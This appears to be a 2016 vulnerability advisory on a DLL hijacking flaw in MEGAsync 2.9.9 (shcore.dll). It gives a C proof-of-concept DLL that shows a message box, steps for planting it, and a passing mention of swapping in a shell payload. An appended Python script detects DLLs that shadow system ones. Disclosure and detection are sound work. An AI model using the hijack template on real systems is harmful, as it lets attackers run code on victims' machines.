MEGAsync version 2.9.9 suffers from a DLL hijacking vulnerability.
467b99e7de6c333211eb620208e20c59316c0ecf3e1759eeb9e0e0987e558cf1
# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://mega.nz
# Software Link: https://mega.nz/MEGAsyncSetup.exe
# Version: 2.9.9
# Tested on: Windows 7
----------------------------------------------------------------------------------------------------------
Vuln DLL: shcore.dll
MEGAsync.exe will search for and load any DLL named "shcore.dll".
If an attacker can place the DLL in a location where the victim opens
MEGAsync.exe, it will load and run the attacker's DLL and code.
An attacker can also generate a msfpayload DLL and spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile the C code below as 'shcore.dll' to create the vuln DLL
2- Place 'shcore.dll' in the same directory as MEGAsync
3- Open MEGAsync.exe :DLL
// gcc test.c -o shcore.dll -shared
// This DLL shows a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

// Declared before DllMain so the call below compiles
int dll_hijack(void);

BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    dll_hijack();
    return 0;
}

int dll_hijack(void)
{
    MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
    return 0;
}
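
A defensive check for the condition described above, as an added example that is not part of the original advisory: it lists DLLs in an application directory whose names match a system DLL, which are the candidates for this kind of hijack, and flags those whose contents differ from the system copy. The directory layout, file names other than shcore.dll and MEGAsync.exe, and file contents are constructed sample data; `find_shadowed_dlls` and `build_sample` are hypothetical names.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def find_shadowed_dlls(app_dir, system_dir):
    """List DLLs in app_dir whose name (case-insensitive) matches a system DLL."""
    system = {n.lower(): os.path.join(system_dir, n)
              for n in os.listdir(system_dir) if n.lower().endswith(".dll")}
    findings = []
    for name in sorted(os.listdir(app_dir)):
        key = name.lower()
        if key not in system:
            continue  # application's own library, no system namesake
        local = os.path.join(app_dir, name)
        findings.append({
            "dll": key,
            "path": local,
            # A differing hash means the local file is not a copy of the system DLL.
            "same_as_system": sha256_of(local) == sha256_of(system[key]),
        })
    return findings


def build_sample():
    """Constructed sample data: stand-in 'system' and application directories."""
    root = tempfile.mkdtemp()
    layout = {
        "System32": {"shcore.dll": b"system shcore", "version.dll": b"system version"},
        "MEGAsync": {"MEGAsync.exe": b"exe", "appcore.dll": b"app library",
                     "SHCore.dll": b"unexpected local copy",
                     "version.dll": b"system version"},
    }
    for folder, files in layout.items():
        os.makedirs(os.path.join(root, folder))
        for name, data in files.items():
            with open(os.path.join(root, folder, name), "wb") as f:
                f.write(data)
    return os.path.join(root, "MEGAsync"), os.path.join(root, "System32")


if __name__ == "__main__":
    for finding in find_shadowed_dlls(*build_sample()):
        status = "matches system copy" if finding["same_as_system"] else "DIFFERS from system copy"
        print(f'{finding["dll"]}: {finding["path"]} ({status})')
```

On a real host the two arguments would be the application's install directory and the Windows system directory.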